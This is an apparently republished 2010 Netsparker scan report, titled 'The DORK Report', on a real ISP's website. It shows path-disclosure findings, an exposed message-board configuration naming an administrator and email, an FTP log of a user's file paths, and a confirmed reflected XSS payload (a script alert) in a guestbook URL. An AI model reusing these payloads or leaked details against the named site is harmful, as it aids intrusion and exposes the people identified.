DSL.</p> </p> <hr> <h2>Premium Business DSL</h2> <p> Speed up your internet connection with DSL!Digital Subscriber Line, a proven technology that uses existing copper wires to provide you with dedicated, fast internet access. Because it's digital, not analog, you can enjoy T-1 like speeds up to 50 times faster than your current modem.</p>All our Premium Business DSL accounts include the following:<ul> <li>FREE Standard Web Hosting</li> <li>FREE 10 Email boxes</li> <li>FREE Unlimited Dial Up Account</li> <li>1 or 2 Year Term Commitment*</li></ul>*(Commences from time packets can be passed through DSL router)<table class="servicetable"><tr class="hrow"><td>Speed</td><td>Email</td><td>Web Hosting</td><td>Starting At</td><td>Setup Fee</td></tr><tr class="irow"><td>Up to 384k</td><td>10 Addresses</td><td>50 Megabytes</td><td>$149</td><td>Yes</td></tr><tr class="irow"><td>512k</td><td>10 Addresses</td><td>50 Megabytes</td><td>$199</td><td>Yes</td></tr><tr class="irow"><td>768k</td><td>10 Addresses</td><td>50 Megabytes</td><td>$249</td><td>Yes</td></tr><tr class="irow"><td>1.1M</td><td>10 Addresses</td><td>50 Megabytes</td><td>$299</td><td>Yes</td></tr><tr class="irow"><td>1.5M</td><td>10 Addresses</td><td>50 Megabytes</td><td>$399</td><td>Yes</td></tr><tr class="irow"><td>2.0M</td><td>10 Addresses</td><td>50 Megabytes</td><td>$489</td><td>Yes</td></tr></table><p style="font-weight: bold;">Call for more information, or fill out our <a href="http://www.gis.net/cgi-bin/businessquote.cgi?regarding=Business+Quote">Quote Request</a> Form. </p> </div> </div> <div id="sidetext"><img src="images/phonewithcoffee.jpg" style="border: 1px solid #999;" alt="Stopwatch" /></div> <div id="credits"> <p style="text-align: center;"> <b style="font-size: 10pt;">Call 617-558-0900 or Toll Free: 888-334-2529</b> </p> <p style="text-align: center;"> <a href="http://start.gis.net">Start Page</a> | <a href="http://astromail.gis.net">Webmail</a> | <a href="terms.html">Terms of Service</a> | <a href="contact.html">Contact</a> </p> <p style="font-size: 8pt; text-align: center; padding-bottom: 20px;"> Copyright © 2006 Galaxy Internet Services Inc. </p> </div> </div> </div> </body></html>

[Possible] Internal Path Leakage (*nix)

3 TOTAL

INFORMATION

Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

Error messages should be disabled.
Remove this kind of private data from the output.

External References

OWASP - Full Path Disclosure

- /~sotis/cgi-bin/crazywwwboard.conf

/~sotis/cgi-bin/crazywwwboard.conf

http://www.gis.net/~sotis/cgi-bin/crazywwwboard.conf

Identified Internal Path(s)

/home/nobreak/public_html/cwb-data
/usr/local/etc/httpd/htdocs/bible/cwb-data
/usr/lib/sendmail

Request

GET /~sotis/cgi-bin/crazywwwboard.conf HTTP/1.1
Referer: http://www.gis.net/~sotis/cgi-bin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:55:04 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 1999 20:55:27 GMT
ETag: "c084f-66a8-c6942dc0"
Accept-Ranges: bytes
Content-Length: 26280
Content-Type: text/plain

LicenseKey = public######################################################################## #### CrazyWWWBoard.conf Realtime Configuration File #### #### Official distribution site : http://cwb98.nobreak.com #### Technical contact : support@nobreak.com #### #### (c) Nobreak Technologies, Inc. ############################################################################ The file(CrazyWWWBoard.conf)is interpreted by CrazyWWWBoard and Cr-## azyAdmin.cgi and reflected into excution immediately.#### CrazyWWWBoard(CWB) has been modified to meet users's various reque-## sts for a long time. So we introduce a realtime reference file cal-## led 'realtime configuration', for easy and quick modification of C-## WB. So most of users do not need to edit source codes.#### This program needs various configurations, but We already setup th-## is file for most of users' environment. If you install CWB for the## first time, You had better modify only RealBasePath and HtmlBasePa-## th element for your environment and maintain all other setup as de-## fault.## If you are certified that all of CWB elements runs properly, modify## another elments as you want at that time.#### The file is interpreted by CWB with next rules.#### 1. Element options are interpreted as following example.## ex) Element Name = Value String#### 2. If first character is '#', that line is never interpreted.## (commentary)## ex) # comments#### 3. Element Name and Value String is interpreted by Case Sensitive.#### 4. Blanks before Element Name, left/right one of '=', one after Va-## lue string are ignored in element options.## ex) Element Name=Value String## Element Name = Value String## Element Name = Value String#### 5. When you declared same element names, the firt one have effect.#### In the file, lines which starts with '##' are explanations and '#'## are examples of using elements## ## CookieEnable = true <- interpreted Element## #CookieEnable = false <- the Element is commentary.#### So, Users will be able to modify most of setup by insert or remove## '#' in front of elements.################################################################################################################################################ [ProgramName]#### Software automatically detect when CrazyWWWBoard.cgi or CrazyAdmin-## .cgi is renamed. This element exist to obtain correct filename of## CrazyAdmin.cgi and CrazyWWWBoard.cgi. So, if you renamed CrazyWWWB-## oard.cgi, please, modify following file correctly.## ## However, We feel sad about renaming this file! We think that crazy## means a mania, so we named this software made with our enthusiasm## CrazyWWWBoard and CrazyAdmin. Using original file name will make us## happy.########################################################################ProgramName = CrazyWWWBoard.cgi######################################################################## [AdminName, AdminEmail]#### Please set Administrator's name and his E-mail address.## They will apply to default configuration after creating DB.########################################################################AdminName = Robert DrakeAdminEmail = rdrake@gis.net######################################################################## [RealBasePath, HtmlBasePath]#### CWB is modified to be installed CGI files and DataBase(DB) files u-## nder separate directories. Up to CWB 3.x version Data directory wa-## s designed to exist under the directory where CGI exists. However## this configuration has made problems such as broken icons according## to web server's setup. When users upgrade new version, they have to## move existing data to new data directory.#### So We designed CGI to be installed under CGI directory such as cgi-## bin, and the following Data into chidren directory of 'document ro-## ot' where normal HTML files reside. Of course same as 3.x version,## Data directory can reside under the CGI directory but as mentioned## above, we recommend installing CGI and Data separately.#### /.../cgi-bin/ -+- CrazyAdmin.cgi## +- CrazyAdmin.conf## +- CrazyWWWBoard.cgi## +- CrazyWWWBoard.conf#### /.../htdocs/.../cwb-data/ -+- data/## ------ +- icon/## | +- icon-type/## V +- logs/## or /public_html/ +- message/#### Owing to changing installation method, CGI demand method to find d-## irectory where data exist. These two elements provide system with## absolute path of cwb-data and HTML on the web.#### Name of data directory in our release is 'cwb-data'.## Above directory will be standard directory of data, icon## icon-type, logs, messanges and so on.#### RealBasePath means absolute system path of cwb-date directory.## It refers shown directory when you type pwd command under the cwb-## data directory on unix shell.#### ex) $ cd cwb-data## $ pwd## /home/nobreak/public_html/cwb-data#### RealBasePath = /home/nobreak/public_html/cwb-data#### HtmlBasePath is cwb-data's absoulte path that based on the Http Do-## cument Root.i.e. It appears as subtracting domain from cwb-data di-## rectory URL on the Web.#### ex) Internet URL -> http://cwb98.nobreak.com/~nobreak/cwb-data## ~~~~~~~~~~~~~~~~~~## HtmlBasePath -> /~nobreak/cwb-data########################################################################RealBasePath = /usr/local/etc/httpd/htdocs/bible/cwb-dataHtmlBasePath = /cwb-data######################################################################## [DefaultCharSet]#### User can specify CharSet of each DB to prevent broken character un-## der the multilanguage environment. i.e. CWB output following conte-## nts.#### <meta .... content="text/html; charset=CharSet">#### If you specify CharSet on the each DB's administrator screen it wi-## ll be used, but if leave blank DefaultCharSet will be used.#### When most of DB should be set to euc-kr, and only a few DB should## be set to x-sjis, this element will be very effective.#### This element play a roll of explaining to browser how to express c-## haracter set other than alphabet. To show multilanguage in one DB## is the roll of the browser.#### If DefaultCharSet and CharSet of DB are set to blank, output will ## be nothing.#### Another reason of using this is to use better font type. For examp-## le, when it is set to euc-kr, GULIM font type will be applied.#### In some Browsers, setting CharSet cause blinking screen.#### If you use different HTML Header, Tailer in each DB's administrator## screen, this function won't be effective. You must type into Header## and Tailer by yourself.#### It doesn't matter that you use without specifying this element und-## er the normal state.########################################################################DefaultCharSet =#DefaultCharSet = iso-8859-1#DefaultCharSet = euc-kr#DefaultCharSet = x-sjis######################################################################## [DefaultTitle]#### You can specify different Browser Titles in each DB(Webboard).## If you don't specify any Brower Title in DB, following DefaultTitle## will be used as Brower Title.########################################################################DefaultTitle = CrazyWWWBoard 98 Professional Edition II######################################################################## [AllowUpload, UploadSoftLimit, UploadHardLimit]#### CWB supports file uploading. This section, explains about elements## concerned with file uploading.#### AllowUpload element can forbid uploading file to any DB. This elem-## ent is useful when each DB's administrator is different. If this## element is set to false, file uploading is forbidden to even the DB## set to upload enable.#### UploadSoftLimit and UploadHardLimit element describe the uploading## limitation of each DB by Kbyte.#### UploadSoftLimit is a relative limitation. If the sum of uploaded f-## iles is greater than defined value, it only forbids uploading (User## can write article) and an attached file should be added.#### UploadHardLimit is a absolute limitation. The sum of uploaded fil-## es cannot greater than defined value in any cases. Even if a user## succeeds to write an article, uploading will be canceled if the sum## of an attached file and uploaded files is greater than the defined## value. If the sum of uploaded files is greater than the defined va-## lue (in the case of setting up UploadHardLimit later), writing an## article will be forbidden.#### Here is the difference between two elements.## When you use UploadSoftLimit, once uploading is allowed, an attach-## ed file will be added though the sum of an attached file and alrea-## dy uploaded files is greater than the defined value, while UploadH-## ardLimit forbid uploading that file.## Even if UploadSoftLimit is set to 1024KB, a file whose size is over## 3000KB can be added. So in most cases, UploadHardLimit will be used## to prevent this confusion.#### Therefore, UploadHardLimit is valid only if it equals to or is gre-## ater than UploadSoftLimit.#### ex) UploadSoftLimit = 1024## UploadHardLimit = 2048#### If defined value equals to 0, uploading will not be forbidden.#### sample) +-------------+---------------+## | MegaBytes | UploadLimit |## +-------------+---------------+## | 1 MB | 1024 |## | 2 MB | 2048 |## | 3 MB | 3072 |## | 5 MB | 5120 |## | 10 MB | 10240 |## | 20 MB | 20480 |## +-------------+---------------+########################################################################AllowUpload = true#AllowUpload = falseUploadSoftLimit = 0#UploadSoftLimit = 1024UploadHardLimit = 0#UploadHardLimit = 5120######################################################################## [DataDirectory, DataExtension]#### In this section, I will explain the directory where webboard DB is## saved and DB file extention.## DataDirectory must be specifed by relative path based on standard## RealBasePath. Default set value will be used, if you don't change## the value because cwb-data/data directory assigned in release pack-## age.#### CWB adopt GDBM as a DB engine, and GDBM use extention 'gdbm' gener-## ally. Let's follow the rule.#### Location where DB is saved will be## RealBasePath/DataDirectory/DB_NAME.DataExtension########################################################################DataDirectory = dataDataExtension = gdbm######################################################################## [StatDirectory, StatExtension]#### Both the directory 'StatDirectory' and 'StatExtension' for file ty-## pe should be mentioned so as to see statistic data on web board.## StatDirectory needs relative directory path based on standard Real-## BasePath. ## We reserve it under cwb-data/stat in released pakage.## ## If StatDirectory remains blank, statistic function will be disable.## It means users can't refer statistic data on web board. ## Here is the actual path where statistic DB will be placed.## RealBasePath/StatDirectory/DB_NAME.StatExtension########################################################################StatDirectory = stat#StatDirectory =StatExtension = stat-gdbm######################################################################## [LogDirectory]#### Log is used for a access statistics and security of each DB.## LogDirectory must be specified and used relative path notaion based## on RealBasePath. Default set value will be used, if you don't chan-## ge the value because cwb-data/data directory assigned in release p-## ackage.#### If you don't want log, because of limited storage capacity, you can## set to blank character string as following. In this case CWB's sta-## tistics function doesn't collect data any more.## LogDirectory =#### Location where log is saved will be ## RealBasePath/LogDirectory/adm_access_log <- CrazyAdmin.cgi## adm_error_log <- CrazyAdmin.cgi#### error_log <- CrazyWWWBoard.cgi## access_log.DB_NAME <- CrazyWWWBoard.cgi## error_log.DB_NAME <- CrazyWWWBoard.cgi########################################################################LogDirectory = log#LogDirectory =######################################################################## [AllowDBhtml, HtmlHead, HtmlTail]#### Basically, CWB output character string such as following onto brow-## ser.#### --[CGI Output 1]-----------## <html>## <head>## <title>Browse Title</title>## <meta http-equiv="Content-Type" content="text/html;## charset=CharSet">## </head>## --[HtmlHead]-------------## <body ...>## ...## <center>## --[CGI Output 2]-----------## ...## ...## --[HtmlTail]-------------## </center>## ...## </body>## --[CGI Output 3]-----------## </html>#### File's content specified in HtmlHead and HtmlTail will be output.## We call this System Default HTML.## ## This is available when supporting most of DB with same interface.## However, if you want to specify different type to a few DB, You can## use options from the DB's administrator menu.#### When different Html used by DB, CGI Output 1, 3 as following won't## output. So, Users have to specify code of CGI Output 1, 3.#### --[DB HTML Header]-----------## <html>## <head>## ...## </head>## <body>## ...## <center>## --[CGI Output]-----------## ...## ...## --[DB HTML Tail]-------------## </center>## ...## </body>## </html>#### AllowDBhtml void HTML Header, Tailer functions of ## DB compulsively. If this is set to false, DBs which used exist## DB HTML function are changed to System Default HTML compulsively.#### Actual location of file is as following, if you don't change the## default value.## RealBasePath/HtmlHead## RealBasePath/HtmlTail########################################################################AllowDBhtml = true#AllowDBhtml = falseHtmlHead = message/htmlhead.htmlHtmlTail = message/htmltail.html######################################################################## [HiddenAdminLink, HiddenStatLink]#### This is used to hide Administrator access icon and statistics icon## which reside on the upper side of each DB. #### When you hide icon, you can access through CrazyAdmin.cgi or as fo-## llowing.## CrazyWWWBoard.cgi?db=DB_NAME&mode=admin## CrazyWWWBoard.cgi?db=DB_NAME&mode=stat########################################################################HiddenAdminLink = false#HiddenAdminLink = trueHiddenStatLink = false#HiddenStatLink = true######################################################################## [HiddenHelpLink, Help]#### HiddenHelpLink element is used to hide help icon from the ## screen. Help element is file's actual linked path.#### Help must be specified by relative path based on HtmlBasePath## and interpreted as following.## HtmlBasePath/Help########################################################################HiddenHelpLink = false#HiddenHelpLink = trueHelp = message/help-en.txt#Help = YOUR_OWN_HELP.html######################################################################## [AllowDBmail, MailHead, MailTail]#### MailHead and Mailtail describe relative path of file which contains## the contents of email header and tail, based on RealBasePath.#### You can send different messages by each DB, when you set up messages## on administration menu of each DBs.#### AllowDBmail determines allowing whether using email message or not.########################################################################AllowDBmail = true#AllowDBmail = falseMailHead = message/mailhead.txtMailTail = message/mailtail.txt######################################################################## [Sendmail, SendmailOptions]#### It specifies location of 'sendmail' that CWB uses to send email.########################################################################Sendmail = /usr/lib/sendmailSendmailOptions = -i -t######################################################################## [MailName, MailOrganization]#### It specifies the name which will be used on the From column, and## the organization name which will be used on the Organization column## in the Email.########################################################################MailName = Tech Support BoardMailOrganization = Galaxy Internet Services######################################################################## [PageLinkNum]#### This set the number of article of page link shown below the viewing## catalog screen.#### Total 1/15 Pages## [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] - [Next] [15]########################################################################PageLinkNum = 10######################################################################## [TextFieldLength]#### It regulate size of original text of the list writing screen. 74 is## optimized value in the various browser.## You can modify this to meet purpose of webboard.########################################################################TextFieldLength = 74######################################################################## [ReSubject, ReText, ReLine]#### When relative sentence is written, specfied relative object senten-## ces are marked. This element specifies symbols to use in this case.#### [Original Text]## Name : Nobreak## Subject : Hi, this is test.## Text : Good!!!#### [Quoted Text]## Subject : Re: Hi, this is test.## Text : Nobreak wrote:## > Good!!!########################################################################ReSubject = Re:ReText = wrote:ReLine = >######################################################################## [CookieEnable]#### If CookieEnable set to true, when user write list, user's name ## and mail address is registered to user's browser. And these are re-## ferred automatically, when the user write next list.#### However, if it is multiuser environment such as college computer## lab this causes chaos because it can refer to old user's name and## address. In this case, you can void this function by set to Cookie-## Enable = false.#### CookieExpireDays is a number of day that set value is valid. 30 da-## ys is appropriate in most cases.########################################################################CookieEnable = false#CookieEnable = falseCookieExpireDays = 30######################################################################## [Icon*]#### It specifies icons linked to each items and relative path based on## HtmlBasePath.########################################################################IconAdminTitle = icon/admintitle.gifIconAdmin = icon/admin.gifIconStat = icon/stat.gifIconHome = icon/home.gifIconBack = icon/back.gifIconHelp = icon/help.gifIconList = icon/list.gifIconReload = icon/reload.gifIconWrite = icon/write.gifIconModify = icon/modify.gifIconReply = icon/reply.gifIconDelete = icon/delete.gifIconUp = icon/up.gifIconDown = icon/down.gifIconBlank = icon/blank.gif##################################..

- /cgi-bin/gbook.cgi/~username/guestbook.html

/cgi-bin/gbook.cgi/~username/guestbook.html

http://www.gis.net/cgi-bin/gbook.cgi/~username/guestbook.html

Identified Internal Path(s)

/usr/local/etc/httpd/htdocs/~username/guestbook.html:

Request

POST /cgi-bin/gbook.cgi/~username/guestbook.html HTTP/1.1
Referer: http://www.gis.net/cgi.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.gis.net
Content-Length: 23
Accept-Encoding: gzip, deflate

address=1&body=1&name=1

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:55:20 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html

<HTML><HEAD><TITLE>Post Results</TITLE></HEAD><BODY>Can't open file /usr/local/etc/httpd/htdocs/~username/guestbook.html: No such file or directory</BODY></HTML>

- /cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C/script%3E

/cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C/script%3E

http://www.gis.net/cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C..

Identified Internal Path(s)

/usr/local/etc/httpd/htdocs/~username/guestbook.html

Request

Response

[Possible] Internal Path Leakage (Windows)

1 TOTAL

INFORMATION

Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.

Error messages should be disabled.
Remove this kind of sensitive data from the output.

External References

OWASP - Full Path Disclosure

- /~sotis/cgi-bin/ws_ftp.log

/~sotis/cgi-bin/ws_ftp.log

http://www.gis.net/~sotis/cgi-bin/ws_ftp.log

Identified Internal Path(s)

C:\bible\cgi
C:\Barish\Underdog\bible\cgi
C:\Barish\Bibles\bible2\cgi
C:\bible2\cgi

Request

GET /~sotis/cgi-bin/ws_ftp.log HTTP/1.1
Referer: http://www.gis.net/~sotis/cgi-bin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:55:04 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 1999 20:55:27 GMT
ETag: "c0850-fc6-c6942dc0"
Accept-Ranges: bytes
Content-Length: 4038
Content-Type: text/plain

1999.09.20 19:03 B C:\bible\cgi-bin\CrazyAdmin.cgi <-- ftp.gis.net /export/home/m/mbarish/bible/cgi-bin CrazyAdmin.cgi
1999.09.20 19:03 B C:\bible\cgi-bin\CrazyAdmin.conf <-- ftp.gis.net /export/home/m/mbarish/bible/cgi-bin CrazyAdmin.conf
1999.09.20 19:03 B C:\bible\cgi-bin\CrazyWWWBoard.cgi <-- ftp.gis.net /export/home/m/mbarish/bible/cgi-bin CrazyWWWBoard.cgi
1999.09.20 19:03 B C:\bible\cgi-bin\CrazyWWWBoard.conf <-- ftp.gis.net /export/home/m/mbarish/bible/cgi-bin CrazyWWWBoard.conf
1999.09.20 20:47 B C:\bible\cgi-bin\WS_FTP.LOG --> ftp.gis.net /export/home/m/mbarish/bible/cgi-bin WS_FTP.LOG
1999.09.20 20:49 B C:\bible\cgi-bin\CrazyAdmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible/cgi-bin CrazyAdmin.cgi
1999.09.20 20:49 B C:\bible\cgi-bin\CrazyAdmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible/cgi-bin CrazyAdmin.conf
1999.09.20 20:49 B C:\bible\cgi-bin\CrazyWWWBoard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible/cgi-bin CrazyWWWBoard.cgi
1999.09.20 20:49 B C:\bible\cgi-bin\CrazyWWWBoard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible/cgi-bin CrazyWWWBoard.conf
1999.09.24 00:07 B C:\Barish\Underdog\bible\cgi-bin\WS_FTP.LOG <-- galaxy /export/home/m/mbarish/public_html/bible/cgi-bin WS_FTP.LOG
1999.09.28 00:29 B C:\Barish\Bibles\bible2\cgi-bin\crazyadmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.cgi
1999.09.28 00:29 B C:\Barish\Bibles\bible2\cgi-bin\crazyadmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.conf
1999.09.28 00:29 B C:\Barish\Bibles\bible2\cgi-bin\crazywwwboard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.cgi
1999.09.28 00:29 B C:\Barish\Bibles\bible2\cgi-bin\crazywwwboard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.conf
99.10.03 11:38 B C:\bible2\cgi-bin\ws_ftp.log <-- mbarish /export/home/m/mbarish/public_html/bible2/cgi-bin ws_ftp.log
99.10.03 16:21 B C:\bible2\cgi-bin\crazyadmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.cgi
99.10.03 16:21 B C:\bible2\cgi-bin\crazyadmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.conf
99.10.03 16:21 B C:\bible2\cgi-bin\crazywwwboard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.cgi
99.10.03 16:21 B C:\bible2\cgi-bin\crazywwwboard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.conf
99.10.03 16:21 B C:\bible2\cgi-bin\ws_ftp.log --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin ws_ftp.log
99.10.06 20:49 B C:\bible2\cgi-bin\crazyadmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.cgi
99.10.06 20:49 B C:\bible2\cgi-bin\crazyadmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.conf
99.10.06 20:49 B C:\bible2\cgi-bin\crazywwwboard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.cgi
99.10.06 20:49 B C:\bible2\cgi-bin\crazywwwboard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.conf
99.10.13 20:03 B C:\bible2\cgi-bin\ws_ftp.log <-- mbarish /export/home/m/mbarish/public_html/bible2/cgi-bin ws_ftp.log
99.10.16 11:51 B C:\bible2\cgi-bin\crazyadmin.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.cgi
99.10.16 11:51 B C:\bible2\cgi-bin\crazyadmin.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazyadmin.conf
99.10.16 11:51 B C:\bible2\cgi-bin\crazywwwboard.cgi --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.cgi
99.10.16 11:51 B C:\bible2\cgi-bin\crazywwwboard.conf --> ftp.gis.net /export/home/m/mbarish/public_html/bible2/cgi-bin crazywwwboard.conf
1999.10.16 13:05 B C:\barish\projects\bibles\bibledone\cgi-bin\ws_ftp.log <-- galaxy /export/home/m/mbarish/public_html/bible2/cgi-bin ws_ftp.log

The DORK Report

NETSPARKER SCAN REPORT SUMMARY

Total Requests

Average Speed

SCAN SETTINGS

VULNERABILITIES

Cross-site Scripting

Impact

Remedy

Remedy References

External References

/cgi-bin/formmail.cgi CONFIRMED

Parameters

Request

Response

/cgi-bin/gbook.cgi/~username/guestbook.html'%22--%3E%3Cscript%3Ealert(0x000E82)%3C/script%3E CONFIRMED

Parameters

Request

Response

/cgi-bin/formmail.cgi CONFIRMED

Parameters

Request

Response

/cgi-bin/formmail.cgi CONFIRMED

Parameters

Request

Response

/cgi-bin/formmail.cgi CONFIRMED

Parameters

Request

Response

/cgi-bin/formmail.cgi CONFIRMED

Parameters

Request

Response

/boston

Parameters

Request

Response

/support/windows/xp

Parameters

Request

Response

/support/windows/win2000

Parameters

Request

Response

/support/windows/winme

Parameters

Request

Response

/support/windows/winnt

Parameters

Request

Response

/support/windows/win98

Parameters

Request

Response

/support/mac/osx

Parameters

Request

Response

/support/mac/imac

Parameters

Request

Response

/support/dsl/win2k

Parameters

Request

Response

/support/dsl/win98

Parameters

Request

Response

/support/dsl/nt

Parameters

Request

Response

/support/dsl/mac